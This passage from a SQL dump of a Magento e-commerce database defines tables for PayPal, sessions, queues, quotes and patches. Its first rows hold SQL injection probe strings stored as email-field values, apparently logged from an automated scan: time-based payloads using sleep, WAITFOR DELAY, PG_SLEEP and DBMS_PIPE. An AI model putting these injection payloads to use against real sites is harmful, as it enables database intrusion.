(48, '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', 2, 1, '2026-01-02 07:33:32'),
(49, 'testing@example.com-1 waitfor delay \'0:0:15\' -- ', 2, 1, '2026-01-02 07:33:37'),
(50, 'testing@example.comBNIRWR5g\'; waitfor delay \'0:0:15\' -- ', 2, 1, '2026-01-02 07:33:42'),
(51, 'testing@example.comtHY4CKdC\' OR 206=(SELECT 206 FROM PG_SLEEP(15))--', 2, 1, '2026-01-02 07:33:48'),
(52, 'testing@example.comdBMhgxKo\') OR 632=(SELECT 632 FROM PG_SLEEP(15))--', 2, 1, '2026-01-02 07:33:52'),
(53, 'testing@example.comajW8Hr2Y\')) OR 988=(SELECT 988 FROM PG_SLEEP(15))--', 2, 1, '2026-01-02 07:33:57'),
(54, 'testing@example.com\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 2, 1, '2026-01-02 07:34:02'),
(55, '(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)', 2, 1, '2026-01-02 07:34:07'),
(56, 'testing@example.com\'\"', 2, 1, '2026-01-02 07:34:08'),
(57, '@@Y3jEf', 2, 1, '2026-01-02 07:34:10'),
(58, '(select 198766*667891)', 2, 1, '2026-01-02 07:34:10'),
(59, '(select 198766*667891 from DUAL)', 2, 1, '2026-01-02 07:34:11');

-- --------------------------------------------------------

--
-- Table structure for table `password_reset_request_event`
--

CREATE TABLE `password_reset_request_event` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `request_type` smallint(5) UNSIGNED NOT NULL COMMENT 'Type of the event under a security control',
  `account_reference` varchar(255) DEFAULT NULL COMMENT 'An identifier for existing account or another target',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Timestamp when the event occurs',
  `ip` varchar(15) NOT NULL COMMENT 'Remote user IP'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Password Reset Request Event under a security control';

-- --------------------------------------------------------

--
-- Table structure for table `patch_list`
--

CREATE TABLE `patch_list` (
  `patch_id` int(11) NOT NULL COMMENT 'Patch Auto Increment',
  `patch_name` varchar(1024) NOT NULL COMMENT 'Patch Class Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='List of data/schema patches';

--
-- Dumping data for table `patch_list`
--

INSERT INTO `patch_list` (`patch_id`, `patch_name`) VALUES
(1, 'Magento\\Store\\Setup\\Patch\\Schema\\InitializeStoresAndWebsites'),
(2, 'Magento\\Catalog\\Setup\\Patch\\Schema\\EnableSegmentation'),
(3, 'Magento\\Bundle\\Setup\\Patch\\Schema\\UpdateBundleRelatedSchema'),
(4, 'Magento\\InventoryCatalog\\Setup\\Patch\\Schema\\CreateLegacyStockStatusView'),
(5, 'Magento\\InventoryCatalog\\Setup\\Patch\\Schema\\InitializeDefaultStock'),
(6, 'Magento\\InventoryCatalog\\Setup\\Patch\\Schema\\UpdateInventorySourceItem'),
(7, 'Magento\\InventoryCatalog\\Setup\\Patch\\Schema\\ReindexDefaultSource'),
(8, 'Magento\\InventorySales\\Setup\\Patch\\Schema\\InitializeWebsiteDefaultSock'),
(9, 'Temando\\ShippingRemover\\Setup\\Patch\\Schema\\EmptyTablesRemoval'),
(10, 'Magento\\Store\\Setup\\Patch\\Data\\DisableSid'),
(11, 'Magento\\Store\\Setup\\Patch\\Data\\UpdateStoreGroupCodes'),
(12, 'Magento\\Directory\\Setup\\Patch\\Data\\InitializeDirectoryData'),
(13, 'Magento\\Directory\\Setup\\Patch\\Data\\AddCountriesCaribbeanCuracaoKosovoSintMaarten'),
(14, 'Magento\\Directory\\Setup\\Patch\\Data\\AddDataForCroatia'),
(15, 'Magento\\Directory\\Setup\\Patch\\Data\\AddDataForIndia'),
(16, 'Magento\\Directory\\Setup\\Patch\\Data\\AddDataForAustralia'),
(17, 'Magento\\Directory\\Setup\\Patch\\Data\\AddDataForBelgium'),
(18, 'Magento\\Directory\\Setup\\Patch\\Data\\AddDataForChina'),
(19, 'Magento\\Directory\\Setup\\Patch\\Data\\AddDataForColombia'),
(20, 'Magento\\Directory\\Setup\\Patch\\Data\\AddDataForMexico'),
(21, 'Magento\\Directory\\Setup\\Patch\\Data\\AddDataForPoland'),
(22, 'Magento\\Config\\Setup\\Patch\\Data\\UpdateClassAliases'),
(23, 'Magento\\Theme\\Setup\\Patch\\Data\\RegisterThemes'),
(24, 'Magento\\Theme\\Setup\\Patch\\Data\\ConvertSerializedData'),
(25, 'Magento\\Eav\\Setup\\Patch\\Data\\InitializeAttributeModels'),
(26, 'Magento\\Customer\\Setup\\Patch\\Data\\DefaultCustomerGroupsAndAttributes'),
(27, 'Magento\\Customer\\Setup\\Patch\\Data\\UpdateCustomerAttributesMetadata'),
(28, 'Magento\\Customer\\Setup\\Patch\\Data\\AddNonSpecifiedGenderAttributeOption'),
(29, 'Magento\\Customer\\Setup\\Patch\\Data\\UpdateIdentifierCustomerAttributesVisibility'),
(30, 'Magento\\Customer\\Setup\\Patch\\Data\\AddCustomerUpdatedAtAttribute'),
(31, 'Magento\\Customer\\Setup\\Patch\\Data\\UpgradePasswordHashAndAddress'),
(32, 'Magento\\Customer\\Setup\\Patch\\Data\\RemoveCheckoutRegisterAndUpdateAttributes'),
(33, 'Magento\\Customer\\Setup\\Patch\\Data\\AddSecurityTrackingAttributes'),
(34, 'Magento\\Customer\\Setup\\Patch\\Data\\UpdateAutocompleteOnStorefrontConfigPath'),
(35, 'Magento\\Customer\\Setup\\Patch\\Data\\MigrateStoresAllowedCountriesToWebsite'),
(36, 'Magento\\Customer\\Setup\\Patch\\Data\\ConvertValidationRulesFromSerializedToJson'),
(37, 'Magento\\Customer\\Setup\\Patch\\Data\\UpdateVATNumber'),
(38, 'Magento\\Customer\\Setup\\Patch\\Data\\UpdateCustomerAttributeInputFilters'),
(39, 'Magento\\Indexer\\Setup\\Patch\\Data\\InitializeIndexerState'),
(40, 'Magento\\Authorization\\Setup\\Patch\\Data\\InitializeAuthRoles'),
(41, 'Magento\\Cms\\Setup\\Patch\\Data\\CreateDefaultPages'),
(42, 'Magento\\Cms\\Setup\\Patch\\Data\\UpdatePrivacyPolicyPage'),
(43, 'Magento\\Cms\\Setup\\Patch\\Data\\ConvertWidgetConditionsToJson'),
(44, 'Magento\\Catalog\\Setup\\Patch\\Data\\InstallDefaultCategories'),
(45, 'Magento\\Catalog\\Setup\\Patch\\Data\\SetNewResourceModelsPaths'),
(46, 'Magento\\Catalog\\Setup\\Patch\\Data\\UpdateDefaultAttributeValue'),
(47, 'Magento\\Catalog\\Setup\\Patch\\Data\\UpdateMediaAttributesBackendTypes'),
(48, 'Magento\\Catalog\\Setup\\Patch\\Data\\UpdateProductAttributes'),
(49, 'Magento\\Catalog\\Setup\\Patch\\Data\\UpdateProductMetaDescription'),
(50, 'Magento\\Catalog\\Setup\\Patch\\Data\\ChangePriceAttributeDefaultScope'),
(51, 'Magento\\Catalog\\Setup\\Patch\\Data\\DisallowUsingHtmlForProductName'),
(52, 'Magento\\Catalog\\Setup\\Patch\\Data\\EnableDirectiveParsing'),
(53, 'Magento\\Catalog\\Setup\\Patch\\Data\\EnableSegmentation'),
(54, 'Magento\\Catalog\\Setup\\Patch\\Data\\UpdateCustomLayoutAttributes'),
(55, 'Magento\\Catalog\\Setup\\Patch\\Data\\UpgradeWidgetData'),
(56, 'Magento\\Catalog\\Setup\\Patch\\Data\\UpgradeWebsiteAttributes'),
(57, 'Magento\\Quote\\Setup\\Patch\\Data\\InstallEntityTypes'),
(58, 'Magento\\Quote\\Setup\\Patch\\Data\\ConvertSerializedDataToJson'),
(59, 'Magento\\CatalogInventory\\Setup\\Patch\\Data\\CreateDefaultStock'),
(60, 'Magento\\CatalogInventory\\Setup\\Patch\\Data\\UpdateStockItemsWebsite'),
(61, 'Magento\\CatalogInventory\\Setup\\Patch\\Data\\ConvertSerializedDataToJson'),
(62, 'Magento\\CatalogRule\\Setup\\Patch\\Data\\UpdateClassAliasesForCatalogRules'),
(63, 'Magento\\CatalogRule\\Setup\\Patch\\Data\\ConvertSerializedDataToJson'),
(64, 'Magento\\Msrp\\Setup\\Patch\\Data\\InitializeMsrpAttributes'),
(65, 'Magento\\Msrp\\Setup\\Patch\\Data\\ChangeMsrpAttributeLabel'),
(66, 'Magento\\Msrp\\Setup\\Patch\\Data\\ChangePriceAttributeDefaultScope'),
(67, 'Magento\\CatalogSearch\\Setup\\Patch\\Data\\MySQLSearchDeprecationNotification'),
(68, 'Magento\\CatalogSearch\\Setup\\Patch\\Data\\SetInitialSearchWeightForAttributes'),
(69, 'Magento\\CatalogUrlRewrite\\Setup\\Patch\\Data\\CreateUrlAttributes'),
(70, 'Magento\\CatalogUrlRewrite\\Setup\\Patch\\Data\\UpdateUrlKeySearchable'),
(71, 'Magento\\Widget\\Setup\\Patch\\Data\\UpgradeModelInstanceClassAliases'),
(72, 'Magento\\Widget\\Setup\\Patch\\Data\\ConvertSerializedData'),
(73, 'Magento\\Sales\\Setup\\Patch\\Data\\InstallOrderStatusesAndInitialSalesConfig'),
(74, 'Magento\\Sales\\Setup\\Patch\\Data\\UpdateEntityTypes'),
(75, 'Magento\\Sales\\Setup\\Patch\\Data\\ConvertSerializedDataToJson'),
(76, 'Magento\\Sales\\Setup\\Patch\\Data\\FillQuoteAddressIdInSalesOrderAddress'),
(77, 'Magento\\Sales\\Setup\\Patch\\Data\\UpdateEntityTypeModelForInvoice'),
(78, 'Magento\\User\\Setup\\Patch\\Data\\UpgradePasswordHashes'),
(79, 'Magento\\User\\Setup\\Patch\\Data\\UpgradeSerializedFields'),
(80, 'Magento\\Checkout\\Setup\\Patch\\Data\\PrepareInitialCheckoutConfiguration'),
(81, 'Magento\\ConfigurableProduct\\Setup\\Patch\\Data\\InstallInitialConfigurableAttributes'),
(82, 'Magento\\ConfigurableProduct\\Setup\\Patch\\Data\\UpdateManufacturerAttribute'),
(83, 'Magento\\ConfigurableProduct\\Setup\\Patch\\Data\\UpdateTierPriceAttribute'),
(84, 'Magento\\CurrencySymbol\\Setup\\Patch\\Data\\ConvertSerializedCustomCurrencySymbolToJson'),
(85, 'Magento\\Integration\\Setup\\Patch\\Data\\RemoveInactiveTokens'),
(86, 'Magento\\Downloadable\\Setup\\Patch\\Data\\AddDownloadableHostsConfig'),
(87, 'Magento\\Downloadable\\Setup\\Patch\\Data\\InstallDownloadableAttributes'),
(88, 'Magento\\Downloadable\\Setup\\Patch\\Data\\UpdateLinksExistDefaultAttributeValue'),
(89, 'Magento\\Dhl\\Setup\\Patch\\Data\\PrepareShipmentDays'),
(90, 'Magento\\Email\\Setup\\Patch\\Data\\FlagLegacyTemplates'),
(91, 'Magento\\EncryptionKey\\Setup\\Patch\\Data\\SodiumChachaPatch'),
(92, 'Magento\\Fedex\\Setup\\Patch\\Data\\ConfigureFedexDefaults'),
(93, 'Magento\\GiftMessage\\Setup\\Patch\\Data\\AddGiftMessageAttributes'),
(94, 'Magento\\GiftMessage\\Setup\\Patch\\Data\\MoveGiftMessageToGiftOptionsGroup'),
(95, 'Magento\\GiftMessage\\Setup\\Patch\\Data\\UpdateGiftMessageAttribute'),
(96, 'Magento\\GroupedProduct\\Setup\\Patch\\Data\\InitializeGroupedProductLinks'),
(97, 'Magento\\GroupedProduct\\Setup\\Patch\\Data\\UpdateProductRelations'),
(98, 'Magento\\Bundle\\Setup\\Patch\\Data\\ApplyAttributesUpdate'),
(99, 'Magento\\Bundle\\Setup\\Patch\\Data\\UpdateBundleRelatedEntityTypes'),
(100, 'Magento\\Analytics\\Setup\\Patch\\Data\\PrepareInitialConfig'),
(101, 'Magento\\Analytics\\Setup\\Patch\\Data\\ActivateDataCollection'),
(102, 'Magento\\InventoryLowQuantityNotification\\Setup\\Patch\\Data\\MigrateCatalogInventoryNotifyStockQuantityData'),
(103, 'Magento\\Reports\\Setup\\Patch\\Data\\InitializeReportEntityTypesAndPages'),
(104, 'Magento\\Reports\\Setup\\Patch\\Data\\ReportDisableNotification'),
(105, 'Magento\\Newsletter\\Setup\\Patch\\Data\\FlagLegacyTemplates'),
(106, 'Magento\\SalesRule\\Setup\\Patch\\Data\\PrepareRuleModelSerializedData'),
(107, 'Magento\\SalesRule\\Setup\\Patch\\Data\\ConvertSerializedDataToJson'),
(108, 'Magento\\SalesRule\\Setup\\Patch\\Data\\FillSalesRuleProductAttributeTable'),
(109, 'Magento\\Vault\\Setup\\Patch\\Data\\SetCreditCardAsDefaultTokenType'),
(110, 'Magento\\Paypal\\Setup\\Patch\\Data\\AddPaypalOrderStatuses'),
(111, 'Magento\\Paypal\\Setup\\Patch\\Data\\UpdatePaypalCreditOption'),
(112, 'Magento\\AuthorizenetAcceptjs\\Setup\\Patch\\Data\\CopyCurrentConfig'),
(113, 'Magento\\Review\\Setup\\Patch\\Data\\InitReviewStatusesAndData'),
(114, 'Magento\\OfflineShipping\\Setup\\Patch\\Data\\UpdateQuoteShippingAddresses'),
(115, 'Magento\\OfflineShipping\\Setup\\Patch\\Data\\UpdateShippingTablerate'),
(116, 'Magento\\Braintree\\Setup\\Patch\\Data\\ConvertSerializedDataToJson'),
(117, 'Magento\\UrlRewrite\\Setup\\Patch\\Data\\ConvertSerializedDataToJson'),
(118, 'Magento\\Swatches\\Setup\\Patch\\Data\\AddSwatchImageAttribute'),
(119, 'Magento\\Swatches\\Setup\\Patch\\Data\\AddSwatchImageToDefaultAttribtueSet'),
(120, 'Magento\\Swatches\\Setup\\Patch\\Data\\UpdateAdminTextSwatchValues'),
(121, 'Magento\\Swatches\\Setup\\Patch\\Data\\ConvertAdditionalDataToJson'),
(122, 'Magento\\Tax\\Setup\\Patch\\Data\\AddTaxAttributeAndTaxClasses'),
(123, 'Magento\\Tax\\Setup\\Patch\\Data\\UpdateTaxClassAttributeVisibility'),
(124, 'Magento\\Tax\\Setup\\Patch\\Data\\UpdateTaxRegionId'),
(125, 'Magento\\SampleData\\Setup\\Patch\\Data\\ClearSampleDataState'),
(126, 'Magento\\Usps\\Setup\\Patch\\Data\\UpdateAllowedMethods'),
(127, 'Magento\\Weee\\Setup\\Patch\\Data\\InitQuoteAndOrderAttributes'),
(128, 'Magento\\Wishlist\\Setup\\Patch\\Data\\ConvertSerializedData'),
(129, 'Klarna\\Core\\Setup\\Patch\\Data\\UpdateKcoApiPathsInCoreConfig'),
(130, 'Klarna\\Core\\Setup\\Patch\\Data\\UpdateKlarnaApiVersionInCoreConfig'),
(131, 'Klarna\\Kp\\Setup\\Patch\\Data\\RemoveHtmlTag'),
(132, 'Klarna\\Kp\\Setup\\Patch\\Data\\ResetIsActive'),
(133, 'Temando\\ShippingRemover\\Setup\\Patch\\Data\\AttributesRemoval'),
(134, 'Temando\\ShippingRemover\\Setup\\Patch\\Data\\BookmarkCleaner'),
(135, 'Temando\\ShippingRemover\\Setup\\Patch\\Data\\ConfigRemoval'),
(136, 'Magento\\CatalogSampleData\\Setup\\Patch\\Data\\InstallCatalogSampleData'),
(137, 'Magento\\GroupedProductSampleData\\Setup\\Patch\\Data\\InstallGroupedProductSampleData'),
(138, 'Magento\\BundleSampleData\\Setup\\Patch\\Data\\InstallBundleSampleData'),
(139, 'Magento\\DownloadableSampleData\\Setup\\Patch\\Data\\InstallDownloadableSampleData'),
(140, 'Magento\\ConfigurableSampleData\\Setup\\Patch\\Data\\InstallConfigurableSampleData'),
(141, 'Magento\\ReviewSampleData\\Setup\\Patch\\Data\\InstallReviewSampleData'),
(142, 'Magento\\ThemeSampleData\\Setup\\Patch\\Data\\InstallThemeSampleData'),
(143, 'Magento\\OfflineShippingSampleData\\Setup\\Patch\\Data\\InstallOfflineShippingSampleData'),
(144, 'Magento\\CatalogRuleSampleData\\Setup\\Patch\\Data\\InstallCatalogRuleSampleData'),
(145, 'Magento\\TaxSampleData\\Setup\\Patch\\Data\\InstallTaxSampleData'),
(146, 'Magento\\SalesRuleSampleData\\Setup\\Patch\\Data\\InstallSalesRuleSampleData'),
(147, 'Magento\\SwatchesSampleData\\Setup\\Patch\\Data\\InstallSwatchesSampleData'),
(148, 'Magento\\MsrpSampleData\\Setup\\Patch\\Data\\InstallMsrpSampleData'),
(149, 'Magento\\CustomerSampleData\\Setup\\Patch\\Data\\InstallCustomerSampleData'),
(150, 'Magento\\CmsSampleData\\Setup\\Patch\\Data\\InstallCmsSampleData'),
(151, 'Magento\\SalesSampleData\\Setup\\Patch\\Data\\InstallSalesSampleData'),
(152, 'Magento\\ProductLinksSampleData\\Setup\\Patch\\Data\\InstallProductLinksSampleData'),
(153, 'Magento\\WidgetSampleData\\Setup\\Patch\\Data\\InstallWidgetSampleData'),
(154, 'Magento\\WishlistSampleData\\Setup\\Patch\\Data\\InstallWishlistSampleData');

-- --------------------------------------------------------

--
-- Table structure for table `paypal_billing_agreement`
--

CREATE TABLE `paypal_billing_agreement` (
  `agreement_id` int(10) UNSIGNED NOT NULL COMMENT 'Agreement ID',
  `customer_id` int(10) UNSIGNED NOT NULL COMMENT 'Customer ID',
  `method_code` varchar(32) NOT NULL COMMENT 'Method Code',
  `reference_id` varchar(32) NOT NULL COMMENT 'Reference ID',
  `status` varchar(20) NOT NULL COMMENT 'Status',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `agreement_label` varchar(255) DEFAULT NULL COMMENT 'Agreement Label'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Billing Agreement';

-- --------------------------------------------------------

--
-- Table structure for table `paypal_billing_agreement_order`
--

CREATE TABLE `paypal_billing_agreement_order` (
  `agreement_id` int(10) UNSIGNED NOT NULL COMMENT 'Agreement ID',
  `order_id` int(10) UNSIGNED NOT NULL COMMENT 'Order ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Billing Agreement Order';

-- --------------------------------------------------------

--
-- Table structure for table `paypal_cert`
--

CREATE TABLE `paypal_cert` (
  `cert_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Cert ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `content` text DEFAULT NULL COMMENT 'Content',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Paypal Certificate Table';

-- --------------------------------------------------------

--
-- Table structure for table `paypal_payment_transaction`
--

CREATE TABLE `paypal_payment_transaction` (
  `transaction_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `txn_id` varchar(100) DEFAULT NULL COMMENT 'Txn ID',
  `additional_information` blob DEFAULT NULL COMMENT 'Additional Information',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='PayPal Payflow Link Payment Transaction';

-- --------------------------------------------------------

--
-- Table structure for table `paypal_settlement_report`
--

CREATE TABLE `paypal_settlement_report` (
  `report_id` int(10) UNSIGNED NOT NULL COMMENT 'Report ID',
  `report_date` date DEFAULT NULL COMMENT 'Report Date',
  `account_id` varchar(64) DEFAULT NULL COMMENT 'Account ID',
  `filename` varchar(24) DEFAULT NULL COMMENT 'Filename',
  `last_modified` timestamp NULL DEFAULT NULL COMMENT 'Last Modified'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Paypal Settlement Report Table';

-- --------------------------------------------------------

--
-- Table structure for table `paypal_settlement_report_row`
--

CREATE TABLE `paypal_settlement_report_row` (
  `row_id` int(10) UNSIGNED NOT NULL COMMENT 'Row ID',
  `report_id` int(10) UNSIGNED NOT NULL COMMENT 'Report ID',
  `transaction_id` varchar(19) DEFAULT NULL COMMENT 'Transaction ID',
  `invoice_id` varchar(127) DEFAULT NULL COMMENT 'Invoice ID',
  `paypal_reference_id` varchar(19) DEFAULT NULL COMMENT 'Paypal Reference ID',
  `paypal_reference_id_type` varchar(3) DEFAULT NULL COMMENT 'Paypal Reference ID Type',
  `transaction_event_code` varchar(5) DEFAULT NULL COMMENT 'Transaction Event Code',
  `transaction_initiation_date` timestamp NULL DEFAULT NULL COMMENT 'Transaction Initiation Date',
  `transaction_completion_date` timestamp NULL DEFAULT NULL COMMENT 'Transaction Completion Date',
  `transaction_debit_or_credit` varchar(2) NOT NULL DEFAULT 'CR' COMMENT 'Transaction Debit Or Credit',
  `gross_transaction_amount` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Gross Transaction Amount',
  `gross_transaction_currency` varchar(3) DEFAULT NULL COMMENT 'Gross Transaction Currency',
  `fee_debit_or_credit` varchar(2) DEFAULT NULL COMMENT 'Fee Debit Or Credit',
  `fee_amount` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Fee Amount',
  `fee_currency` varchar(3) DEFAULT NULL COMMENT 'Fee Currency',
  `custom_field` varchar(255) DEFAULT NULL COMMENT 'Custom Field',
  `consumer_id` varchar(127) DEFAULT NULL COMMENT 'Consumer ID',
  `payment_tracking_id` varchar(255) DEFAULT NULL COMMENT 'Payment Tracking ID',
  `store_id` varchar(50) DEFAULT NULL COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Paypal Settlement Report Row Table';

-- --------------------------------------------------------

--
-- Table structure for table `persistent_session`
--

CREATE TABLE `persistent_session` (
  `persistent_id` int(10) UNSIGNED NOT NULL COMMENT 'Session ID',
  `key` varchar(50) NOT NULL COMMENT 'Unique cookie key',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `info` text DEFAULT NULL COMMENT 'Session Data',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Persistent Session';

-- --------------------------------------------------------

--
-- Table structure for table `product_alert_price`
--

CREATE TABLE `product_alert_price` (
  `alert_price_id` int(10) UNSIGNED NOT NULL COMMENT 'Product alert price ID',
  `customer_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Price amount',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `store_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Store ID',
  `add_date` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Product alert add date',
  `last_send_date` timestamp NULL DEFAULT NULL COMMENT 'Product alert last send date',
  `send_count` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product alert send count',
  `status` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product alert status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Product Alert Price';

-- --------------------------------------------------------

--
-- Table structure for table `product_alert_stock`
--

CREATE TABLE `product_alert_stock` (
  `alert_stock_id` int(10) UNSIGNED NOT NULL COMMENT 'Product alert stock ID',
  `customer_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Customer ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `store_id` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Store ID',
  `add_date` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Product alert add date',
  `send_date` timestamp NULL DEFAULT NULL COMMENT 'Product alert send date',
  `send_count` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Send Count',
  `status` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product alert status'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Product Alert Stock';

-- --------------------------------------------------------

--
-- Table structure for table `queue`
--

CREATE TABLE `queue` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Queue ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Queue name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Table storing unique queues';

--
-- Dumping data for table `queue`
--

INSERT INTO `queue` (`id`, `name`) VALUES
(9, 'async.operations.all'),
(8, 'codegenerator'),
(3, 'export'),
(5, 'inventory.mass.update'),
(6, 'inventory.reservations.cleanup'),
(7, 'inventory.reservations.update'),
(4, 'inventory.source.items.cleanup'),
(1, 'product_action_attribute.update'),
(2, 'product_action_attribute.website.update');

-- --------------------------------------------------------

--
-- Table structure for table `queue_lock`
--

CREATE TABLE `queue_lock` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Message ID',
  `message_code` varchar(255) NOT NULL DEFAULT '' COMMENT 'Message Code',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Created At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Messages that were processed are inserted here to be locked.';

-- --------------------------------------------------------

--
-- Table structure for table `queue_message`
--

CREATE TABLE `queue_message` (
  `id` bigint(20) UNSIGNED NOT NULL COMMENT 'Message ID',
  `topic_name` varchar(255) DEFAULT NULL COMMENT 'Message topic',
  `body` longtext DEFAULT NULL COMMENT 'Message body'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Queue messages';

-- --------------------------------------------------------

--
-- Table structure for table `queue_message_status`
--

CREATE TABLE `queue_message_status` (
  `id` bigint(20) UNSIGNED NOT NULL COMMENT 'Relation ID',
  `queue_id` int(10) UNSIGNED NOT NULL COMMENT 'Queue ID',
  `message_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Message ID',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `status` smallint(5) UNSIGNED NOT NULL COMMENT 'Message status in particular queue',
  `number_of_trials` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Number of trials to processed failed message processing'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Relation table to keep associations between queues and messages';

-- --------------------------------------------------------

--
-- Table structure for table `queue_poison_pill`
--

CREATE TABLE `queue_poison_pill` (
  `version` varchar(255) NOT NULL COMMENT 'Poison Pill version.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sequence table for poison pill versions';

--
-- Dumping data for table `queue_poison_pill`
--

INSERT INTO `queue_poison_pill` (`version`) VALUES
('version-60c0616f4d9fb');

-- --------------------------------------------------------

--
-- Table structure for table `quote`
--

CREATE TABLE `quote` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `converted_at` timestamp NULL DEFAULT NULL COMMENT 'Converted At',
  `is_active` smallint(5) UNSIGNED DEFAULT 1 COMMENT 'Is Active',
  `is_virtual` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Is Virtual',
  `is_multi_shipping` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Is Multi Shipping',
  `items_count` int(10) UNSIGNED DEFAULT 0 COMMENT 'Items Count',
  `items_qty` decimal(12,4) DEFAULT 0.0000 COMMENT 'Items Qty',
  `orig_order_id` int(10) UNSIGNED DEFAULT 0 COMMENT 'Orig Order ID',
  `store_to_base_rate` decimal(12,4) DEFAULT 0.0000 COMMENT 'Store To Base Rate',
  `store_to_quote_rate` decimal(12,4) DEFAULT 0.0000 COMMENT 'Store To Quote Rate',
  `base_currency_code` varchar(255) DEFAULT NULL COMMENT 'Base Currency Code',
  `store_currency_code` varchar(255) DEFAULT NULL COMMENT 'Store Currency Code',
  `quote_currency_code` varchar(255) DEFAULT NULL COMMENT 'Quote Currency Code',
  `grand_total` decimal(20,4) DEFAULT 0.0000 COMMENT 'Grand Total',
  `base_grand_total` decimal(20,4) DEFAULT 0.0000 COMMENT 'Base Grand Total',
  `checkout_method` varchar(255) DEFAULT NULL COMMENT 'Checkout Method',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `customer_tax_class_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer Tax Class ID',
  `customer_group_id` int(10) UNSIGNED DEFAULT 0 COMMENT 'Customer Group ID',
  `customer_email` varchar(255) DEFAULT NULL COMMENT 'Customer Email',
  `customer_prefix` varchar(40) DEFAULT NULL COMMENT 'Customer Prefix',
  `customer_firstname` varchar(255) DEFAULT NULL COMMENT 'Customer Firstname',
  `customer_middlename` varchar(40) DEFAULT NULL COMMENT 'Customer Middlename',
  `customer_lastname` varchar(255) DEFAULT NULL COMMENT 'Customer Lastname',
  `customer_suffix` varchar(40) DEFAULT NULL COMMENT 'Customer Suffix',
  `customer_dob` datetime DEFAULT NULL COMMENT 'Customer Dob',
  `customer_note` varchar(255) DEFAULT NULL COMMENT 'Customer Note',
  `customer_note_notify` smallint(5) UNSIGNED DEFAULT 1 COMMENT 'Customer Note Notify',
  `customer_is_guest` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Customer Is Guest',
  `remote_ip` varchar(45) DEFAULT NULL COMMENT 'Remote Ip',
